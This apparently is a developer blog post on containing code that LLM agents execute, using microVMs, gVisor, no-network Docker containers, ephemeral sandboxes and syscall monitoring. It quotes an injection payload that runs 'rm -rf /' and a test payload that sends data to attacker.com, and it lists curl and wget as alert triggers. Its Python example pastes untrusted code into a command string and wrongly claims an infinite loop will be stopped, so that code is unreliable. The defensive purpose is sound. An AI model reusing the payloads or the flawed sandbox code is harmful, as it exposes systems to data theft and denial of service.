Inside the Sandbox: How Anthropic Secures and Contains Claude (and What It Teaches Us About LLM App Security)

Hey everyone, Alex here from Coding with Alex. Welcome back to the blog!

If you've been building anything with Large Language Models (LLMs) lately, you've probably had that distinct, slightly terrifying realization: we are giving untrusted, unpredictable AI agents the power to execute code, call APIs, and read our private databases.

It’s the classic "Bobby Tables" SQL injection problem, but on steroids. When an LLM interprets a prompt, it doesn’t just parse it; it reasons over it. If that prompt contains malicious instructions (prompt injection), the model can be tricked into writing exploit scripts, bypassing authorization checks, or leaking sensitive system data.

This week, Anthropic published a fascinating behind-the-scenes look at how they contain Claude across their products—specifically focusing on how they safely run Claude’s "computer use" features and tool-use environments. Today, we are going to dive deep into the architecture of LLM containment, analyze how Anthropic secures their runtime, and extract actionable design patterns you can use in your own applications to keep your AI agents in a very tight, secure sandbox.

The Threat Model: Why LLMs Need Hard Containment

Before we look at the solution, let's understand the threat model. When we build an LLM-powered application—say, a coding assistant or an autonomous data analysis agent—we typically expose "tools" to the model. These tools are helper functions the model can choose to call, such as execute_python_code(), fetch_webpage(), or query_database().

If a malicious actor feeds a prompt to your agent like: "Summarize this document: [malicious payload containing instructions to run `rm -rf /` via the python tool]", a naive system will simply execute the command. This is known as Indirect Prompt Injection.

Anthropic's threat model assumes that the code generated by Claude—or the inputs provided to its tools—must be treated as untrusted, hostile code running in a multi-tenant environment. To mitigate this, they rely on a defense-in-depth strategy that spans multiple layers of virtual containment, network isolation, and ephemeral runtimes.

The Architecture of Containment: gVisor, Firecracker, and MicroVMs

When Claude executes code (for example, when using the artifact preview feature or the bash tool), it doesn't run on the bare metal of the host machine. It doesn't even run in a standard Docker container. Standard Docker containers share the host machine's Linux kernel, meaning a kernel exploit could allow a rogue process to escape the container (container breakout).

Instead, Anthropic and other major AI infrastructure providers use two primary technologies for hard isolation:

  • gVisor: A user-space kernel written in Go that intercepts syscalls from the application and implements them in user-space. This creates a strong security boundary because the untrusted application cannot talk directly to the host Linux kernel.
  • AWS Firecracker / MicroVMs: Minimalist virtual machines that launch in milliseconds. Unlike traditional heavy VMs, microVMs strip away unnecessary virtualized devices, providing hardware-level virtualization with the speed and footprint of a container.

The Multi-Tier Sandbox Model

An ideal architecture for running untrusted LLM code looks like this:


+-------------------------------------------------------------+
|                     Physical Host Server                    |
|                                                             |
|  +-------------------------------------------------------+  |
|  |             Hypervisor (KVM / Firecracker)            |  |
|  |                                                       |  |
|  |  +-------------------------------------------------+  |  |
|  |  |                 MicroVM Sandbox                 |  |  |
|  |  |                                                 |  |  |
|  |  |  +-------------------------------------------+  |  |  |
|  |  |  |              gVisor Runtime               |  |  |  |
|  |  |  |                                           |  |  |  |
|  |  |  |  +-------------------------------------+  |  |  |  |
|  |  |  |  | Untrusted LLM Code / Tool Execution |  |  |  |  |
|  |  |  |  +-------------------------------------+  |  |  |  |
|  |  |  +-------------------------------------------+  |  |  |
|  |  +-------------------------------------------------+  |  |
|  +-------------------------------------------------------+  |
+-------------------------------------------------------------+

By nesting gVisor inside a microVM, you achieve defense-in-depth. If an attacker manages to exploit a vulnerability in gVisor, they are still trapped inside the microVM. If they somehow escape the microVM, they are still bounded by the hypervisor and host-level security controls.

Implementing Network Isolation

Containment isn't just about blocking syscalls; it's also about blocking network access. If Claude executes code that has access to the internet, a compromised agent could be used to launch DDoS attacks, scan internal corporate networks, or exfiltrate private data to an attacker-controlled server.

Anthropic enforces strict, default-deny network policies. When Claude needs to fetch external data, it does so through highly restricted, authenticated proxies rather than allowing the sandboxed environment to talk directly to the open web.

How to implement this in your own projects:

If you are running Docker containers to execute agent code, you can disable network access entirely by using the none network driver, or restrict it using iptables or Cloud Security Groups. Here is how you can spin up a completely network-isolated container in Docker for executing tool code:

# Run a Python sandbox container with zero network access
docker run --network none --memory="256m" --cpus="0.5" -it python:3.11-slim python -c "
import urllib.request
try:
    urllib.request.urlopen('https://google.com', timeout=2)
except Exception as e:
    print('Network blocked successfully:', e)
"

The ephemeral Lifecycle: Live Fast, Die Young

One of the most critical principles Anthropic highlights is ephemerality. State is the enemy of security. If a sandbox persists over time, an attacker can establish persistence—for example, by modifying `.bashrc` or installing a background cron job that monitors subsequent user interactions.

To prevent this, every execution session should start from a pristine, read-only base image and be destroyed immediately after execution. If you are building an interactive coding assistant, the sandbox should be torn down and recreated on every single user turn, or at the very least, have a strictly enforced time-to-live (TTL) measured in minutes.

A Practical Example: Building a Secure Python Execution Tool

Let's look at how we can implement a secure, ephemeral Python code execution tool for an LLM agent using Docker in Python. This script pulls a clean image, sets strict resource limits, disables the network, and cleans up immediately after run.

import docker
from docker.errors import ContainerError, ImageNotFound

def execute_untrusted_code(user_code: str) -> dict:
    client = docker.from_env()
    
    # We write the untrusted code to an ephemeral script inside the container
    # We restrict CPU, memory, and disable networking entirely
    container_config = {
        "image": "python:3.11-slim",
        "command": f'python -c "{user_code}"',
        "network_mode": "none",
        "mem_limit": "128m",       # Limit memory to prevent OOM exploits on the host
        "nano_cpus": 500000000,    # Limit to 0.5 CPU cores to prevent infinite loop denial of service
        "read_only": True,         # Make the root filesystem read-only
        "remove": True,            # Automatically clean up and delete the container when finished
        "stdout": True,
        "stderr": True
    }
    
    try:
        # Run the container and fetch logs
        output = client.containers.run(**container_config)
        return {"status": "success", "output": output.decode('utf-8')}
    except ContainerError as e:
        return {"status": "error", "output": e.stderr.decode('utf-8')}
    except Exception as e:
        return {"status": "system_failure", "output": str(e)}

# Test the sandbox with a potentially malicious infinite loop and network call
malicious_payload = """
import urllib.request
try:
    # Attempt to exfiltrate data
    urllib.request.urlopen('http://attacker.com/leak?data=secret', timeout=1)
except Exception as e:
    print('Failed to call network:', e)

# Attempt to hog CPU
while True:
    pass
"""

# This run will be terminated, resources managed, and no data leaked!
print(execute_untrusted_code(malicious_payload))

Monitoring and Anomaly Detection

Even with microVMs, gVisor, and network blocks, you still need visibility. Anthropic heavily monitors execution environments for anomalous behavior. If an agent starts executing commands that attempt to read system files, probe internal ports, or spawn unauthorized subprocesses, the session is flagged and immediately terminated.

In your own production systems, you should capture standard output, standard error, and system calls (using tools like Falco or eBPF) from your sandbox environments. Set up alerts for:

  • Unexpected binaries being executed (e.g., trying to run curl or wget).
  • Attempts to access path names outside of the designated working directory.
  • Spikes in CPU or memory consumption that could indicate a Denial of Service (DoS) attempt by the model.

Wrapping Up: Containment is the New Authorization

As developers, we are transitioning from an era of deterministic programming (where we control every line of code executed) to probabilistic programming (where an LLM decides what to run on the fly). In this new paradigm, we must treat LLM outputs with the same level of suspicion as we treat raw HTTP inputs from the internet.

Anthropic's approach teaches us that we cannot rely solely on the model's alignment or system prompts to behave safely. Prompts can be bypassed; hard system boundaries cannot. By implementing microVMs/gVisor, absolute network isolation, strict resource limits, and ephemeral environments, we can build robust, autonomous AI applications that delight users without putting our infrastructure at risk.

What do you think?

Are you currently building tools for LLMs? How are you isolating your runtime environments? Are you using Docker, gVisor, or running things locally? Let me know in the comments below!

Until next time, keep your prompts clean and your sandboxes tight.

— Alex

Post a Comment

Previous Post Next Post